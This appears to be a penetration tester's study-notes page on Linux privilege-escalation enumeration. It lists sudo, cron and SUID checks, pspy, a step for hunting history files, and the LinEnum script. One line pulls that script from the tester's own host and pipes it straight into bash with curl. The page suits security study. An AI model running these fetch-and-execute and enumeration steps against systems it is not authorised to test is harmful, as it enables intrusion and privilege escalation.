search

2 Enums

hashtag
Start

sudo -l
crontab -l
ps auxww
uname -a
find / -type f -a (-perm -u+s -o -perm -g+s ) -exec ls -l {} ; 2> /dev/null

pspy   ..snoop processes
find / -type f -user www-data 2>/dev/null    ..files
find / -type d -user www-data 2>/dev/null    ..dirs

hashtag
LinEnum

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
cp /opt/LinEnum/LinEnum.sh .
python -m SimpleHTTPServer 80

cd /dev/shm/   ..ramdisk (data wont actually save to disk)
cd /tmp        ..optional (way i've been doing it)

curl $MyIP:8000/LinEnum.sh -t | bash       ..Easy execute and Thorough
curl $MyIP:8000/LinEnum.sh -o LinEnum.sh   ..Download

LinEnum.sh -h                         ..help
LinEnum.sh -k password -e export -t   ..keyword, export, thorough

hashtag
Linux Smart Enumerationarrow-up-right

hashtag
PsPy32

hashtag
Timers

hashtag
Tools

  • Get the tools.zip from UdemyClass, and save them as a toolset

hashtag
REFS

hashtag
Bonus Enums:

hashtag
SUID/SGID

hashtag
Writeable

hashtag
Enumeration Plan

  1. Check your id, whoami

  2. Linux Smart Enumeration (lse) with increasing levels

    1. lse

    2. lse -l 1

    3. lse -l 2

  3. LinEnum and other scripts

  4. If they are failing, run them manually

    1. Or Check other cheatsheets

    2. https://blog.g0tmi1k.com/..linux-privilege-escalation

  5. Check common file

    1. /var/backup

    2. /var/logs

    3. /tmp

    4. /home/user/.*history

Try easy ones first:

  1. sudo, cron, suid

  2. root processes, enumerate version, check exploits

  3. internal ports you can forward to your-remote-machine

Harder:

  1. Re-read your enums, look for oddities

  2. Unusual file-systems (not ext,swap,tmpfs)

  3. Strange usernames

  4. Kernel exploits

Previous1 Look AroundNext3 PrivEsc

Last updated